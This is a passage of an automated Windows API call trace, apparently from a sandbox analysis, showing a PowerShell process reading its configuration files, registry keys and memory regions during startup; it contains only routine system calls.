	[0291.985] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.985] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.985] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.985] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.986] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.986] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.986] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.986] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.992] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.993] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.993] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.993] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.993] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.994] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.994] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.994] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.995] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1b4, lpOverlapped=0x0) returned 1
	[0291.995] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x0, lpOverlapped=0x0) returned 1
	[0291.995] CloseHandle (hObject=0x334) returned 1
	[0291.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0291.995] SetErrorMode (uMode=0x1) returned 0x1
	[0291.995] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d0e0 | out: lpFileInformation=0x12d0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0291.996] SetErrorMode (uMode=0x1) returned 0x1
	[0291.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0291.996] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1c8 | out: phkResult=0x12d1c8*=0x334) returned 0x0
	[0291.996] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d14c, lpData=0x0, lpcbData=0x12d148*=0x0 | out: lpType=0x12d14c*=0x1, lpData=0x0, lpcbData=0x12d148*=0x56) returned 0x0
	[0291.996] CoTaskMemAlloc (cb=0x5a) returned 0x3a5010
	[0291.996] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d11c, lpData=0x3a5010, lpcbData=0x12d118*=0x56 | out: lpType=0x12d11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d118*=0x56) returned 0x0
	[0291.996] CoTaskMemFree (pv=0x3a5010) 
	[0291.996] RegCloseKey (hKey=0x334) returned 0x0
	[0291.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0291.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0293.643] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.646] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.646] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.646] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.646] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.646] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.647] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.648] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.657] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.657] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.657] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.657] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.657] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.658] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.658] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.658] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.664] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.671] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.671] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.671] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.671] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.672] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.672] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.672] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.672] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.377] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.377] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.377] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.377] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.378] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.379] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.380] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.380] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.380] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.381] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.403] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.403] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.404] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.407] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0294.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0294.407] CoTaskMemFree (pv=0x3a7210) 
	[0294.408] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.413] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.413] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.413] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.413] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.414] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.414] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.415] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.415] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.416] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d368 | out: phkResult=0x12d368*=0x334) returned 0x0
	[0294.416] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0x12d37c, lpData=0x0, lpcbData=0x12d378*=0x0 | out: lpType=0x12d37c*=0x1, lpData=0x0, lpcbData=0x12d378*=0x74) returned 0x0
	[0294.416] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0x12d2ec, lpData=0x0, lpcbData=0x12d2e8*=0x0 | out: lpType=0x12d2ec*=0x1, lpData=0x0, lpcbData=0x12d2e8*=0x74) returned 0x0
	[0294.416] CoTaskMemAlloc (cb=0x78) returned 0x3552d0
	[0294.416] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0x12d2bc, lpData=0x3552d0, lpcbData=0x12d2b8*=0x74 | out: lpType=0x12d2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d2b8*=0x74) returned 0x0
	[0294.416] CoTaskMemFree (pv=0x3552d0) 
	[0294.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0294.416] SetErrorMode (uMode=0x1) returned 0x1
	[0294.417] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d240 | out: lpFileInformation=0x12d240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0294.417] SetErrorMode (uMode=0x1) returned 0x1
	[0294.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0294.418] SetErrorMode (uMode=0x1) returned 0x1
	[0294.418] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d240 | out: lpFileInformation=0x12d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0294.419] SetErrorMode (uMode=0x1) returned 0x1
	[0294.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0294.419] SetErrorMode (uMode=0x1) returned 0x1
	[0294.419] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d240 | out: lpFileInformation=0x12d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0294.419] SetErrorMode (uMode=0x1) returned 0x1
